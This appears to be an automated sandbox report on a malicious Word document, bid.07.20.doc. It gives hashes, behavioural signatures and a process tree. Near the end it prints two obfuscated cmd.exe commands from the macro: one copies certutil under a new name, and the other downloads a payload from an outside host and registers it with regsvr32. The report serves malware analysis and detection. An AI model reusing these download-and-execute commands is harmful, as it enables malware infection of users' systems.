Analysis
-
max time kernel
60s -
max time network
43s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
03-08-2020 20:04
Static task
static1
Behavioral task
behavioral1
Sample
bid.07.20.doc
Resource
win7v200722
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
bid.07.20.doc
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
bid.07.20.doc
-
Size
110KB
-
MD5
df1c3c76ae77a9c9e14e642e211e1cdf
-
SHA1
012dcfc2876916eaf12c1356e5fe893c7d155c70
-
SHA256
a01810ab151d6b800e1b6d9c692485fe5c6462d7c6900b197cebd19a3c7a154f
-
SHA512
7bf330e64225a6294b3085fdc435478c5405f2c4379ceca4e285e319288091a7cd72ea688ff944414cbc62ef28240a9a05b4bb202fce1fe9959e7de1898ab1dd
Score
10/10
Malware Config
Signatures
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
pid Process 840 cmd.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1060 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 16 IoCs
pid Process 1060 WINWORD.EXE 1060 WINWORD.EXE 1060 WINWORD.EXE 1060 WINWORD.EXE 1060 WINWORD.EXE 1060 WINWORD.EXE 1060 WINWORD.EXE 1060 WINWORD.EXE 1060 WINWORD.EXE 1060 WINWORD.EXE 1060 WINWORD.EXE 1060 WINWORD.EXE 1060 WINWORD.EXE 1060 WINWORD.EXE 1060 WINWORD.EXE 1060 WINWORD.EXE -
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 304 1060 cmd.exe 23 Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 840 1060 cmd.exe 23 -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1060 wrote to memory of 304 1060 WINWORD.EXE 24 PID 1060 wrote to memory of 304 1060 WINWORD.EXE 24 PID 1060 wrote to memory of 304 1060 WINWORD.EXE 24 PID 1060 wrote to memory of 840 1060 WINWORD.EXE 25 PID 1060 wrote to memory of 840 1060 WINWORD.EXE 25 PID 1060 wrote to memory of 840 1060 WINWORD.EXE 25
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\bid.07.20.doc"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe2⤵
- Process spawned unexpected child process
PID:304
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://vkr0bt.com/bolb/jaent.php?l=liut6.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Process spawned unexpected child process
PID:840
-